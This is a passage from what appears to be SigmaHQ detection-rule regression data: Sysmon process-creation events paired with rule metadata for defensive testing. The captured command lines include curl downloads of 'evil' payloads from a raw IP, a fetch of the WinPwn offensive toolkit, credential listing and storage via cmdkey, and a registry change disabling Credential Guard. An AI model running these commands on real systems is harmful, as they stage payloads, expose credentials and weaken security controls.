provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:16:49.968129Z"
}
},
"EventRecordID": 8498306,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:16:49.961",
"ProcessGuid": "5AA13A44-CDC1-68FC-F82F-000000004002",
"ProcessId": 608,
"Image": "C:\\Windows\\System32\\cmd.exe",
"FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)",
"Description": "Windows Command Processor",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "Cmd.Exe",
"CommandLine": "cmd /c \"rmdir /s /q malware_folder\"",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml
================================================
id: 20a05730-38e8-4889-ab29-0723f185deb0
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 41ca393d-538c-408a-ac27-cf1e038be80c
title: Directory Removal Via Rmdir
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:20:36.737647Z"
}
},
"EventRecordID": 8565164,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:20:36.729",
"ProcessGuid": "5AA13A44-CEA4-68FC-1330-000000004002",
"ProcessId": 4944,
"Image": "C:\\Windows\\System32\\cmdkey.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Credential Manager Command Line Utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "cmdkey.exe",
"CommandLine": "\"C:\\Windows\\system32\\cmdkey.exe\" /generic:TERMSRV/AR-WIN-DC /user:ATTACKRANGE\\Administrator /pass:1password2!",
"CurrentDirectory": "C:\\tools\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A",
"ParentProcessGuid": "5AA13A44-0BE6-68FC-A61D-000000004002",
"ParentProcessId": 10004,
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"ParentCommandLine": "powershell -noprofile",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml
================================================
id: 56a1d988-b883-41dc-ba91-6077c43189df
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: b1ec66c6-f4d1-4b5c-96dd-af28ccae7727
title: New Generic Credentials Added Via Cmdkey.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:21:33.116889Z"
}
},
"EventRecordID": 8581967,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:21:33.111",
"ProcessGuid": "5AA13A44-CEDD-68FC-1B30-000000004002",
"ProcessId": 7876,
"Image": "C:\\Windows\\System32\\cmdkey.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Credential Manager Command Line Utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "cmdkey.exe",
"CommandLine": "cmdkey /list",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml
================================================
id: aa97fab6-a83e-4e4f-ad0b-f0cc2a43c24e
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 07f8bdc2-c9b3-472a-9817-5a670b872f53
title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:38:32.006926Z"
}
},
"EventRecordID": 12090706,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:38:32.006",
"ProcessGuid": "5AA13A44-0B18-68FD-6336-000000004002",
"ProcessId": 7232,
"Image": "C:\\Windows\\System32\\conhost.exe",
"FileVersion": "10.0.20348.4294 (WinBuild.160101.0800)",
"Description": "Console Window Host",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CONHOST.EXE",
"CommandLine": "conhost --headless powershell calc",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=061B747FBA99B050D8874167AAD6D1D790F8A3A8,MD5=7E13A7EA7BD3601760E3838D99E31710,SHA256=D7714ECAE976F14B3AFA409FF5A3616E8D6D0CCE8269E611D7835A7C12235D6B,IMPHASH=AFF4D1EA89D0D66F7D04180143E61D12",
"ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002",
"ParentProcessId": 3204,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml
================================================
id: 6e70bb8b-561e-4af4-bad6-f582c656d047
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 056c7317-9a09-4bd4-9067-d051312752ea
title: Powershell Executed From Headless ConHost Process
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/c17d47b7-dcd6-4109-87eb-d1817bd4cbc9.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-26T06:45:49.034405Z"
}
},
"EventRecordID": 23573,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3484,
"ThreadID": 3424
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-26 06:45:49.010",
"ProcessGuid": "0197231E-2F1D-694E-F304-000000000A00",
"ProcessId": 12232,
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"FileVersion": "10.0.26100.1 (WinBuild.160101.0800)",
"Description": "Windows PowerShell",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "PowerShell.EXE",
"CommandLine": "\"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"Set-ItemProperty -Path \"HKLM:Software\\Policies\\Microsoft\\Windows\\DeviceGuard\" -Name \"EnableVirtualizationBasedSecurity\" -Value 0\"",
"CurrentDirectory": "C:\\Windows\\System32\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-DDAE-694E-10B6-120000000000",
"LogonId": "0x12b610",
"TerminalSessionId": 1,
"IntegrityLevel": "High",
"Hashes": "MD5=1736263E02468939F808C0528E8DBB7E,SHA256=1F9FFC2227F8DEA8B771D543C464CF8166C22A39420A5322B5892A640C4B34B6,IMPHASH=68A9FF9C8D0D4655E46E1A7A190A41D2",
"ParentProcessGuid": "00000000-0000-0000-0000-000000000000",
"ParentProcessId": 10996,
"ParentImage": "-",
"ParentCommandLine": "-",
"ParentUser": "-"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/info.yml
================================================
id: f96a3ce2-ae73-4171-8877-71ccf1da7ce5
description: N/A
date: 2025-12-26
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: c17d47b7-dcd6-4109-87eb-d1817bd4cbc9
title: Windows Credential Guard Registry Tampering Via CommandLine
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/c17d47b7-dcd6-4109-87eb-d1817bd4cbc9.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-11T06:22:12.568940Z"
}
},
"EventRecordID": 21497,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-11 06:22:12.498",
"ProcessGuid": "0197231E-6314-693A-D112-000000000800",
"ProcessId": 11000,
"Image": "C:\\Windows\\System32\\curl.exe",
"FileVersion": "8.10.1",
"Description": "The curl executable",
"Product": "The curl executable",
"Company": "curl, https://curl.se/",
"OriginalFileName": "curl.exe",
"CommandLine": "curl.exe --cookie-jar cookie \"http://example.com\"",
"CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000",
"LogonId": "0x3144c",
"TerminalSessionId": 1,
"IntegrityLevel": "High",
"Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
"ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800",
"ParentProcessId": 3476,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml
================================================
id: d7f159c3-db76-4e39-b677-c0958f5f82b8
description: N/A
date: 2025-12-11
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 5a6e1e16-07de-48d8-8aae-faa766c05e88
title: Potential Cookies Session Hijacking
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-11T06:17:19.772545Z"
}
},
"EventRecordID": 21475,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-11 06:17:19.636",
"ProcessGuid": "0197231E-61EF-693A-C812-000000000800",
"ProcessId": 6400,
"Image": "C:\\Windows\\System32\\curl.exe",
"FileVersion": "8.10.1",
"Description": "The curl executable",
"Product": "The curl executable",
"Company": "curl, https://curl.se/",
"OriginalFileName": "curl.exe",
"CommandLine": "curl.exe -H \"User-Agent: EvilAgent\" http://example.com",
"CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000",
"LogonId": "0x3144c",
"TerminalSessionId": 1,
"IntegrityLevel": "High",
"Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
"ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800",
"ParentProcessId": 3476,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml
================================================
id: 6428e458-fe2e-4936-accb-aebd0bcc8e35
description: N/A
date: 2025-12-11
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 85de1f22-d189-44e4-8239-dc276b45379b
title: Curl Web Request With Potential Custom User-Agent
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-11T07:02:39.732592Z"
}
},
"EventRecordID": 21767,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-11 07:02:39.718",
"ProcessGuid": "0197231E-6C8F-693A-2613-000000000800",
"ProcessId": 17752,
"Image": "C:\\Windows\\System32\\curl.exe",
"FileVersion": "8.10.1",
"Description": "The curl executable",
"Product": "The curl executable",
"Company": "curl, https://curl.se/",
"OriginalFileName": "curl.exe",
"CommandLine": "curl --output hello.txt https://12.34.56.78/hack/evil.txt",
"CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
"ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
"ParentProcessId": 14736,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml
================================================
id: 6aac357c-fe1d-4ca0-82e2-df626f71e838
description: N/A
date: 2025-12-11
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218
title: File Download From IP URL Via Curl.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-11T06:34:20.042883Z"
}
},
"EventRecordID": 21588,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-11 06:34:19.983",
"ProcessGuid": "0197231E-65EB-693A-F112-000000000800",
"ProcessId": 14440,
"Image": "C:\\Windows\\System32\\curl.exe",
"FileVersion": "8.10.1",
"Description": "The curl executable",
"Product": "The curl executable",
"Company": "curl, https://curl.se/",
"OriginalFileName": "curl.exe",
"CommandLine": "curl --output benign.hta \"https://12.34.56.78/hack/evil.hta\"",
"CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
"ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
"ParentProcessId": 14736,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml
================================================
id: 0f1b33fc-f97e-4469-a9ec-32ffb436f490
description: N/A
date: 2025-12-11
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 5cb299fc-5fb1-4d07-b989-0644c68b6043
title: Suspicious File Download From IP Via Curl.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-11T06:41:38.130858Z"
}
},
"EventRecordID": 21642,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-11 06:41:38.096",
"ProcessGuid": "0197231E-67A2-693A-FF12-000000000800",
"ProcessId": 9656,
"Image": "C:\\Windows\\System32\\curl.exe",
"FileVersion": "8.10.1",
"Description": "The curl executable",
"Product": "The curl executable",
"Company": "curl, https://curl.se/",
"OriginalFileName": "curl.exe",
"CommandLine": "curl -O \"https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1\"",
"CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
"ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
"ParentProcessId": 14736,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml
================================================
id: 68e8f5c3-5a3b-4878-82d3-24d961eb219b
description: N/A
date: 2025-12-11
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb
title: Suspicious File Download From File Sharing Domain Via Curl.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-11T06:43:20.070938Z"
}
},
"EventRecordID": 21651,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-11 06:43:20.052",
"ProcessGuid": "0197231E-6808-693A-0413-000000000800",
"ProcessId": 17792,
"Image": "C:\\Windows\\System32\\curl.exe",
"FileVersion": "8.10.1",
"Description": "The curl executable",
"Product": "The curl executable",
"Company": "curl, https://curl.se/",
"OriginalFileName": "curl.exe",
"CommandLine": "curl --insecure http://example.com",
"CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
